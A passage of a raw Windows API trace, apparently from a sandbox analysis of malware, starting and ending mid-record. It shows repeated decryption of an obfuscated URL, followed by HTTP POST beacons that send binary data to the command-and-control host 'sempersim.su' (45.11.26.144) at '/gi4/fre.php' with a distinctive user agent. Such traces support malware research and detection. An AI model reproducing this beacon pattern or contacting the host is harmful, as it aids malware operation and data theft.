ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0156.769] GetProcessHeap () returned 0x5b0000 [0156.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0156.769] socket (af=2, type=1, protocol=6) returned 0x2a0 [0156.769] connect (s=0x2a0, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0156.838] FreeAddrInfoW (pAddrInfo=0x5cd628*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0156.839] GetProcessHeap () returned 0x5b0000 [0156.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5bb8 [0156.839] GetProcessHeap () returned 0x5b0000 [0156.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0156.839] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0156.840] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0156.840] GetProcessHeap () returned 0x5b0000 [0156.840] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0156.840] GetProcessHeap () returned 0x5b0000 [0156.841] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0156.841] GetProcessHeap () returned 0x5b0000 [0156.841] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0156.841] GetProcessHeap () returned 0x5b0000 [0156.841] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0156.842] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0156.843] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0156.843] GetProcessHeap () returned 0x5b0000 [0156.843] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cd978 [0156.843] GetProcessHeap () returned 0x5b0000 [0156.844] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0156.844] send (s=0x2a0, buf=0x5cd978*, len=236, flags=0) returned 236 [0156.845] send (s=0x2a0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0156.845] GetProcessHeap () returned 0x5b0000 [0156.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5cda70 [0156.845] recv (in: s=0x2a0, buf=0x5cda70, len=4048, flags=0 | out: buf=0x5cda70*) returned 237 [0158.375] GetProcessHeap () returned 0x5b0000 [0158.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd978 | out: hHeap=0x5b0000) returned 1 [0158.376] GetProcessHeap () returned 0x5b0000 [0158.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0158.376] GetProcessHeap () returned 0x5b0000 [0158.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0158.376] GetProcessHeap () returned 0x5b0000 [0158.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5bb8 | out: hHeap=0x5b0000) returned 1 [0158.377] closesocket (s=0x2a0) returned 0 [0158.377] GetProcessHeap () returned 0x5b0000 [0158.377] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0158.377] GetProcessHeap () returned 0x5b0000 [0158.377] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0158.378] GetProcessHeap () returned 0x5b0000 [0158.378] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d30c8 | out: hHeap=0x5b0000) returned 1 [0158.378] GetProcessHeap () returned 0x5b0000 [0158.378] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0158.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5cda70, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x10c8) returned 0x2a0 [0158.380] Sleep (dwMilliseconds=0xea60) [0158.390] GetProcessHeap () returned 0x5b0000 [0158.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d30c8 [0158.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.391] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0158.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.399] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0158.411] GetProcessHeap () returned 0x5b0000 [0158.411] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0158.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.412] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0158.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.413] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0158.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.414] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.414] GetProcessHeap () returned 0x5b0000 [0158.415] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0158.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.416] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d30c8, pdwDataLen=0xdfcfc | out: pbData=0x5d30c8, pdwDataLen=0xdfcfc) returned 1 [0158.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.416] CryptDestroyKey (hKey=0x5be048) returned 1 [0158.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.417] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0158.417] GetProcessHeap () returned 0x5b0000 [0158.417] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0158.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.418] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0158.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.419] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0158.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.420] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0158.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.427] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0158.427] GetProcessHeap () returned 0x5b0000 [0158.427] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0158.427] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0158.427] GetProcessHeap () returned 0x5b0000 [0158.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0158.428] GetProcessHeap () returned 0x5b0000 [0158.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0158.428] GetProcessHeap () returned 0x5b0000 [0158.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d30c8 | out: hHeap=0x5b0000) returned 1 [0158.428] GetProcessHeap () returned 0x5b0000 [0158.429] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0158.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.430] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0158.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.436] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0158.446] GetProcessHeap () returned 0x5b0000 [0158.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0158.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.448] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0158.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.449] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0158.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.450] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.450] GetProcessHeap () returned 0x5b0000 [0158.450] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0158.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.451] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0158.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.455] CryptDestroyKey (hKey=0x5be288) returned 1 [0158.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0158.456] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0158.456] GetProcessHeap () returned 0x5b0000 [0158.456] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0158.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.457] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0158.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.458] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0158.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0158.459] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0158.459] GetProcessHeap () returned 0x5b0000 [0158.459] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0158.460] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd358*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0158.462] GetProcessHeap () returned 0x5b0000 [0158.462] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0158.462] socket (af=2, type=1, protocol=6) returned 0x2a4 [0158.462] connect (s=0x2a4, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0158.532] FreeAddrInfoW (pAddrInfo=0x5cd358*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0158.532] GetProcessHeap () returned 0x5b0000 [0158.532] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5d50 [0158.532] GetProcessHeap () returned 0x5b0000 [0158.532] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0158.533] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0158.534] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0158.534] GetProcessHeap () returned 0x5b0000 [0158.534] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0158.534] GetProcessHeap () returned 0x5b0000 [0158.534] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0158.535] GetProcessHeap () returned 0x5b0000 [0158.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3308 [0158.535] GetProcessHeap () returned 0x5b0000 [0158.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0158.535] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0158.536] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0158.536] GetProcessHeap () returned 0x5b0000 [0158.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cd978 [0158.537] GetProcessHeap () returned 0x5b0000 [0158.537] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0158.537] send (s=0x2a4, buf=0x5cd978*, len=236, flags=0) returned 236 [0158.538] send (s=0x2a4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0158.538] GetProcessHeap () returned 0x5b0000 [0158.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5cda70 [0158.538] recv (in: s=0x2a4, buf=0x5cda70, len=4048, flags=0 | out: buf=0x5cda70*) returned 237 [0160.309] GetProcessHeap () returned 0x5b0000 [0160.309] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd978 | out: hHeap=0x5b0000) returned 1 [0160.309] GetProcessHeap () returned 0x5b0000 [0160.310] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0160.310] GetProcessHeap () returned 0x5b0000 [0160.310] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0160.310] GetProcessHeap () returned 0x5b0000 [0160.310] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5d50 | out: hHeap=0x5b0000) returned 1 [0160.310] closesocket (s=0x2a4) returned 0 [0160.312] GetProcessHeap () returned 0x5b0000 [0160.312] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0160.312] GetProcessHeap () returned 0x5b0000 [0160.312] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0160.312] GetProcessHeap () returned 0x5b0000 [0160.313] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0160.313] GetProcessHeap () returned 0x5b0000 [0160.313] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0160.329] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5cda70, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x10b8) returned 0x2a4 [0160.337] Sleep (dwMilliseconds=0xea60) [0160.346] GetProcessHeap () returned 0x5b0000 [0160.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0160.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.347] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0160.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.369] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5ee8) returned 1 [0160.383] GetProcessHeap () returned 0x5b0000 [0160.383] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0160.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.384] CryptImportKey (in: hProv=0x5c5ee8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0160.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.385] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0160.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.386] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.386] GetProcessHeap () returned 0x5b0000 [0160.387] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0160.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.388] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0160.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.396] CryptDestroyKey (hKey=0x5be288) returned 1 [0160.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.397] CryptReleaseContext (hProv=0x5c5ee8, dwFlags=0x0) returned 1 [0160.397] GetProcessHeap () returned 0x5b0000 [0160.397] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0160.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.398] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0160.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.399] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0160.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.400] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0160.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.401] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0160.401] GetProcessHeap () returned 0x5b0000 [0160.401] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0160.401] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0160.402] GetProcessHeap () returned 0x5b0000 [0160.402] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0160.402] GetProcessHeap () returned 0x5b0000 [0160.403] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0160.403] GetProcessHeap () returned 0x5b0000 [0160.403] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0160.403] GetProcessHeap () returned 0x5b0000 [0160.403] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3350 [0160.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.404] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0160.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.413] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5910) returned 1 [0160.420] GetProcessHeap () returned 0x5b0000 [0160.420] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0160.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.423] CryptImportKey (in: hProv=0x5c5910, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0160.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.424] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0160.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.425] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.425] GetProcessHeap () returned 0x5b0000 [0160.426] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0160.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.427] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3350, pdwDataLen=0xdfcfc | out: pbData=0x5d3350, pdwDataLen=0xdfcfc) returned 1 [0160.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.428] CryptDestroyKey (hKey=0x5be048) returned 1 [0160.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0160.429] CryptReleaseContext (hProv=0x5c5910, dwFlags=0x0) returned 1 [0160.429] GetProcessHeap () returned 0x5b0000 [0160.429] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0160.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.430] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0160.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.431] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0160.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0160.432] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0160.432] GetProcessHeap () returned 0x5b0000 [0160.432] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0160.432] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0160.434] GetProcessHeap () returned 0x5b0000 [0160.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0160.434] socket (af=2, type=1, protocol=6) returned 0x2a8 [0160.434] connect (s=0x2a8, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0160.505] FreeAddrInfoW (pAddrInfo=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0160.505] GetProcessHeap () returned 0x5b0000 [0160.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, 